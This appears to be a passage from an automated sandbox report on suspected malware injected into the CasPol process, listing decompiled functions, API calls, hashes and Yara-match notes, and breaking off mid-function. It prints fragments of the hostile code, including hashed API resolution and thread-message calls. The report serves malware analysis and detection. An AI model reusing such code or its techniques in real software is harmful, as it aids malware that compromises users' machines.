                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                • Instruction ID: 8a7637670b8b5f5ea7151550ae918a7c7ae5d1151593d8b3a588b182ebfc21d3
                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                • Instruction Fuzzy Hash: F9F01EB6200208ABCB18DF89EC81EEB77ADAF88754F018159BE0897241C630F811CBB4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E6E3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0041E6E3(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                0x0041e6fa
                                                                0x0041e708
                                                                0x0041e70c

                                                                APIs
                                                                • NtClose.NTDLL(004102D8,00000000,?,004102D8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E708
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                • Instruction ID: c101b25af9ac9ac4ebbb787b08598838618d03c1626203936ca23b9d25103650
                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                • Instruction Fuzzy Hash: FFD01776604214ABD710EBE9EC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4695e64c2c40e64619faac65e399cb0999a84b4dbd0868e7d5dbe03ab1075378
                                                                • Instruction ID: 5e08d7068ea4aa736484ed1a64031c44616ca963b12c76e80819ac585f736545
                                                                • Opcode Fuzzy Hash: 4695e64c2c40e64619faac65e399cb0999a84b4dbd0868e7d5dbe03ab1075378
                                                                • Instruction Fuzzy Hash: FA9002B120100402E140759948057470109ABD0341F51C411A5055554EC6998DD576A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7260c4e954a2a5acae82a67e0e12353f0d1008f1db04e5cfbcbe6d81f96ecd09
                                                                • Instruction ID: 6eacbef5086a18f167f80593dbe9a18137ac7f069bc6d9a28ff37751df4708f2
                                                                • Opcode Fuzzy Hash: 7260c4e954a2a5acae82a67e0e12353f0d1008f1db04e5cfbcbe6d81f96ecd09
                                                                • Instruction Fuzzy Hash: DA9002A134100442E10065994815B070109EBE1341F51C415E1055554DC659CC527166
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1cc4e7fa23f13f29dfa7427ea5f49eb9407d003dcd4fff3ebdf49267cfbbc0d5
                                                                • Instruction ID: 6d58a2faf690b2989f720c3154e63c4898615998eba9e71d497f2280cda6e71f
                                                                • Opcode Fuzzy Hash: 1cc4e7fa23f13f29dfa7427ea5f49eb9407d003dcd4fff3ebdf49267cfbbc0d5
                                                                • Instruction Fuzzy Hash: 3390027120100413E11165994905707010DABD0281F91C812A0415558DD6968952B161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4af5785f29226946f3b7a489ad4a1f23ae585ed9f1c255de1f15264e59ba3217
                                                                • Instruction ID: b68d2debb647f9d3a2089aa0b30902935a67335c972d18a668a28cd20ea23695
                                                                • Opcode Fuzzy Hash: 4af5785f29226946f3b7a489ad4a1f23ae585ed9f1c255de1f15264e59ba3217
                                                                • Instruction Fuzzy Hash: B2900261242041526545B5994805507410ABBE0281791C412A1405950CC5669856E661
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016698F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 48badcf748ca49d06d0e7aa895d33ca5eb0532989f595718192ed089913d99b2
                                                                • Instruction ID: 3d242d129301b9cf52e0b88dc5a26ffb651051505f9672a92d9d3fe49b8404a7
                                                                • Opcode Fuzzy Hash: 48badcf748ca49d06d0e7aa895d33ca5eb0532989f595718192ed089913d99b2
                                                                • Instruction Fuzzy Hash: F590026160100502E10175994805617010EABD0281F91C422A1015555ECA658992B171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 45b24b4ed35f735f6490af5e80f51d9536933a5c7bdd558a6a2e4f40577847c1
                                                                • Instruction ID: 3b886fe7c749730ecd9488da7dc858d6f001c54f6af8667746315c7b95d160bb
                                                                • Opcode Fuzzy Hash: 45b24b4ed35f735f6490af5e80f51d9536933a5c7bdd558a6a2e4f40577847c1
                                                                • Instruction Fuzzy Hash: FB90026121180042E20069A94C15B070109ABD0343F51C515A0145554CC95588616561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 425b57803654045e84b56c55b0c98d228fd7d84051e4ca081c9419ddd64bab02
                                                                • Instruction ID: b2ac5fa06f7b5ee6c9acd390625d5adb19b00781b49473fb268f6db86531285b
                                                                • Opcode Fuzzy Hash: 425b57803654045e84b56c55b0c98d228fd7d84051e4ca081c9419ddd64bab02
                                                                • Instruction Fuzzy Hash: 8190026160100042514075A98C459074109BFE1251751C521A0989550DC599886566A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e7fb41b680768ac571e418549dd0b5029131d5a3f2251bfafb055618dfc8b0a9
                                                                • Instruction ID: 91dc3d55fdf9489e285e492b3c6edf992ee60e47f6ed2f0700432001ffad95b0
                                                                • Opcode Fuzzy Hash: e7fb41b680768ac571e418549dd0b5029131d5a3f2251bfafb055618dfc8b0a9
                                                                • Instruction Fuzzy Hash: C990027120140402E10065994C1570B0109ABD0342F51C411A1155555DC665885175B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 54a120b450a6b574131af2247711ba8d09d09c4c9836f1c7cf8f28c7aaa57dc0
                                                                • Instruction ID: 97381257ac39b6d704c1a615b256c7a249c93cfa87fd4f0a4c2cb1f5de2209ff
                                                                • Opcode Fuzzy Hash: 54a120b450a6b574131af2247711ba8d09d09c4c9836f1c7cf8f28c7aaa57dc0
                                                                • Instruction Fuzzy Hash: 16900265211000031105A9990B05507014AABD5391351C421F1006550CD66188616161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 2d5ade9b71c17b032e5501165f43fca07027ec6a390432d06e56b991e576bdf6
                                                                • Instruction ID: f83788d181a51b1010d40679d5a747e47d3e66a8c39561165d302fc641f72541
                                                                • Opcode Fuzzy Hash: 2d5ade9b71c17b032e5501165f43fca07027ec6a390432d06e56b991e576bdf6
                                                                • Instruction Fuzzy Hash: F39002A120200003510575994815617410EABE0241B51C421E1005590DC56588917165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a1b0e108146eb88b9cb0b001e753ee3ded0e46e90ede6ff8123b4d84462afda8
                                                                • Instruction ID: d9ce8fed38ad710fa411acb87931bc596137d1e543f2dbe46f914f0a6384093f
                                                                • Opcode Fuzzy Hash: a1b0e108146eb88b9cb0b001e753ee3ded0e46e90ede6ff8123b4d84462afda8
                                                                • Instruction Fuzzy Hash: BC90027120100402E10069D958096470109ABE0341F51D411A5015555EC6A588917171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e07ac8f22ab8bd4bff436631292db202f9b1720b62437a5955a5fe7e2d9f6566
                                                                • Instruction ID: 6ef7b7c60f3a243c2697aeb6053367af3fb9aa233c400b9a78860d41a3498bd5
                                                                • Opcode Fuzzy Hash: e07ac8f22ab8bd4bff436631292db202f9b1720b62437a5955a5fe7e2d9f6566
                                                                • Instruction Fuzzy Hash: 5590027131114402E110659988057070109ABD1241F51C811A0815558DC6D588917162
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016697A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1ebcd834e7331a3e470be0593bd031cef48be1e5758ad5a1d7beb91406beb646
                                                                • Instruction ID: f4d70074179660d00a780723423afb42a9c78ae94439a09da750f5ed3c2e1313
                                                                • Opcode Fuzzy Hash: 1ebcd834e7331a3e470be0593bd031cef48be1e5758ad5a1d7beb91406beb646
                                                                • Instruction Fuzzy Hash: 6590026130100003E140759958196074109FBE1341F51D411E0405554CD95588566262
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3726c4443f82630d7941897cb1b25cd0948b5cdf3fb264c95039442da0ea36b9
                                                                • Instruction ID: 6024f3bb3764a7275f690d78e5c990575fd7dd9941186ef6a3d9cfaf24140d0a
                                                                • Opcode Fuzzy Hash: 3726c4443f82630d7941897cb1b25cd0948b5cdf3fb264c95039442da0ea36b9
                                                                • Instruction Fuzzy Hash: FF90026921300002E1807599580960B0109ABD1242F91D815A0006558CC95588696361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01669660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7c053d0607ce535d3b7aa0bc93dbb6a0b66d85357260057cd22388b5ec1b2fbc
                                                                • Instruction ID: 005c10d7e018414e348443fc90b590a7bc4ade48a797e3477f45d43931b337f0
                                                                • Opcode Fuzzy Hash: 7c053d0607ce535d3b7aa0bc93dbb6a0b66d85357260057cd22388b5ec1b2fbc
                                                                • Instruction Fuzzy Hash: 2490027120100802E1807599480564B0109ABD1341F91C415A0016654DCA558A5977E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b89755669673f18c9e163e68eb869f9203f9d089a38bf6c8c26eb9347e27d638
                                                                • Instruction ID: 63e6a4c36fa03743358e5b7162632170ffedb0f7bf3282dcd066677c04f19ce1
                                                                • Opcode Fuzzy Hash: b89755669673f18c9e163e68eb869f9203f9d089a38bf6c8c26eb9347e27d638
                                                                • Instruction Fuzzy Hash: 4490027120108802E1106599880574B0109ABD0341F55C811A4415658DC6D588917161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E903 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3 41e903-41e91c 4 41e922-41e92b ExitProcess 3->4 5 41e91d call 41f223 3->5 5->4
                                                                C-Code - Quality: 100%
                                                                			E0041E903(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F223( *((intOrPtr*)(_a4 + 0x980)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x980)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                0x0041e906
                                                                0x0041e91d
                                                                0x0041e92b

                                                                APIs
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E92B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID: G5@
                                                                • API String ID: 621844428-1585037681
                                                                • Opcode ID: 617ccf727b282b404c2f8b27e3b33080a1333c516f09a61b6c5667a9e896709c
                                                                • Instruction ID: cfca8e1907c1f24ac97838efb92421b828cf6b07f9a05c4ff859c04d5774fe7b
                                                                • Opcode Fuzzy Hash: 617ccf727b282b404c2f8b27e3b33080a1333c516f09a61b6c5667a9e896709c
                                                                • Instruction Fuzzy Hash: 83D0C2316002047BCB20DBC8DC45FD377ACDF45650F0080A5BA0C5B242C530BA00C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E8FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6 41e8fc-41e92b call 41f223 ExitProcess
                                                                C-Code - Quality: 100%
                                                                			E0041E8FC(intOrPtr _a4, int _a8) {

				_t7 = _a4;
				E0041F223( *((intOrPtr*)(_a4 + 0x980)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x980)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                0x0041e906
                                                                0x0041e91d
                                                                0x0041e92b

                                                                APIs
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E92B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID: G5@
                                                                • API String ID: 621844428-1585037681
                                                                • Opcode ID: b5eb8c7284e0b1afb1aaa59d8cfe6a5d791b4cfa1d429cfee80398c8dfa6d21e
                                                                • Instruction ID: 25254aa45f2800970d74b2d606c2a39324453796c864d9a28a6af291f1becf86
                                                                • Opcode Fuzzy Hash: b5eb8c7284e0b1afb1aaa59d8cfe6a5d791b4cfa1d429cfee80398c8dfa6d21e
                                                                • Instruction Fuzzy Hash: 3CE0C2316002007BC7209F84CC86FD73768AF45750F048468B9185B382CA75EA04C7D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040984B Relevance: 1.6, APIs: 1, Instructions: 69threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 251 40984b-40984c 252 40984e-409852 251->252 253 40981f-409822 251->253 254 409854-4098a7 call 4201f3 call 420ca3 call 40ced3 call 402de3 call 4195b3 252->254 255 4098a9-4098ba PostThreadMessageW 252->255 253->251 254->255 256 4098e0-4098e6 254->256 255->256 257 4098bc-4098dd call 40c5a3 255->257 257->256
                                                                C-Code - Quality: 50%
                                                                			E0040984B(void* __eflags, long _a8, signed int _a12) {
				char _v59;
				char _v60;
				signed int __esi;
				void* __ebp;
				void* _t12;
				void* _t13;
				void* _t17;

				if(__eflags != 0) {
					asm("cld");
					_push(_t19);
					_t13 = E0041FB83(_t12, _t17, 0x11c6f95e);
					return E0041FA43(_t17) + _t13 + 0x1000;
				} else {
					_pop(__edi);
					asm("repe mov dl, 0x74");
					asm("loop 0x57");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax =  &_v59;
					_v60 = 0;
					__eax = E004201F3( &_v59, 0, 0x3f);
					__ecx =  &_v60;
					__eax = E00420CA3( &_v60, 3);
					__ebx = _a12;
					__edx =  &_v60;
					__esi = __ebx + 0x20;
					__eax = E0040CED3(__eflags, __ebx + 0x20,  &_v60); // executed
					__edi = __eax;
					__eax = E00402DE3(__edx, __eax, 0x40fa3591);
					__eax = E004195B3(__ebx + 0x20, __edi, 0, 0, __eax);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = __ebx;
							__eax = E0040C5A3(1, 8, __ebx);
							__eax = __al & 0x000000ff;
							__ecx = __ebp + __eax - 0x40;
							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
						}
					}
					_pop(__edi);
					_pop(__esi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}










                                                                0x0040984c
                                                                0x00409822
                                                                0x00409823
                                                                0x00409829
                                                                0x00409840
                                                                0x0040984e
                                                                0x0040984e
                                                                0x0040984f
                                                                0x00409852
                                                                0x00409853
                                                                0x00409854
                                                                0x00409856
                                                                0x00409859
                                                                0x0040985a
                                                                0x0040985b
                                                                0x0040985e
                                                                0x00409864
                                                                0x00409868
                                                                0x0040986d
                                                                0x00409873
                                                                0x00409878
                                                                0x0040987b
                                                                0x0040987f
                                                                0x00409883
                                                                0x0040988d
                                                                0x0040988f
                                                                0x0040989b
                                                                0x004098a0
                                                                0x004098a5
                                                                0x004098a7
                                                                0x004098a9
                                                                0x004098b6
                                                                0x004098b8
                                                                0x004098ba
                                                                0x004098bd
                                                                0x004098c8
                                                                0x004098cd
                                                                0x004098d3
                                                                0x004098de
                                                                0x004098de
                                                                0x004098ba
                                                                0x004098e0
                                                                0x004098e1
                                                                0x004098e2
                                                                0x004098e3
                                                                0x004098e5
                                                                0x004098e6
                                                                0x004098e6

                                                                APIs
                                                                • PostThreadMessageW.USER32(00008636,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: c3635962a35c2da16ccf53f9b7e33bcf54d1b93ac691d575dc8918acee59a986
                                                                • Instruction ID: 0b434b31da4b3ab7f4c4012a727e40b77ef3b60e89b6b7e7875c55ce8a6f77e7
                                                                • Opcode Fuzzy Hash: c3635962a35c2da16ccf53f9b7e33bcf54d1b93ac691d575dc8918acee59a986
                                                                • Instruction Fuzzy Hash: 0911CD72A4021576E7106695DC82FFF735C9B41754F14413AFB047A1C2D6ECAE0686E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00409853 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 270 409853-409864 271 40986d-4098a7 call 420ca3 call 40ced3 call 402de3 call 4195b3 270->271 272 409868 call 4201f3 270->272 281 4098e0-4098e6 271->281 282 4098a9-4098ba PostThreadMessageW 271->282 272->271 282->281 283 4098bc-4098dd call 40c5a3 282->283 283->281
                                                                C-Code - Quality: 84%
                                                                			E00409853(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __edi;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E004201F3( &_v67, 0, 0x3f);
				E00420CA3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CED3(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402DE3( &_v68, _t13, 0x40fa3591));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5A3(1, 8, _t19 + 0x730) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                                                0x00409853
                                                                0x00409864
                                                                0x00409868
                                                                0x00409873
                                                                0x00409878
                                                                0x00409883
                                                                0x0040989b
                                                                0x004098a0
                                                                0x004098a7
                                                                0x004098a9
                                                                0x004098b6
                                                                0x004098ba
                                                                0x00000000
                                                                0x004098de
                                                                0x004098ba
                                                                0x004098e6

                                                                APIs
                                                                • PostThreadMessageW.USER32(00008636,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: dafd9375c071f31cdbe3e20ae08b8a341ca6574c2996ce21f49670a253e36335
                                                                • Instruction ID: e773a7ee659482fa6fe3328f06cdbd4708deb785414366536410655b291b0b06
                                                                • Opcode Fuzzy Hash: dafd9375c071f31cdbe3e20ae08b8a341ca6574c2996ce21f49670a253e36335
                                                                • Instruction Fuzzy Hash: CB01C872A4022876E71066919C82FFF376C9B40B44F040129FE04BA1C2D6E8AE0586E9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041EA14 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 308 41ea14-41ea22 309 41ea24-41ea3d call 41f223 308->309 310 41ea79-41ea7c 308->310 314 41ea42-41ea57 LookupPrivilegeValueW 309->314 312 41ea82-41ea93 310->312 313 41ea7d call 41f223 310->313 313->312
                                                                C-Code - Quality: 25%
                                                                			E0041EA14(signed int __eax, signed int __esi, void* _a4, void* _a8, void* _a12, void* _a16) {
				void* _v0;
				signed int _t13;

				_push(__eax);
				_t13 = __eax ^  *(__esi + 0xa);
				asm("aaa");
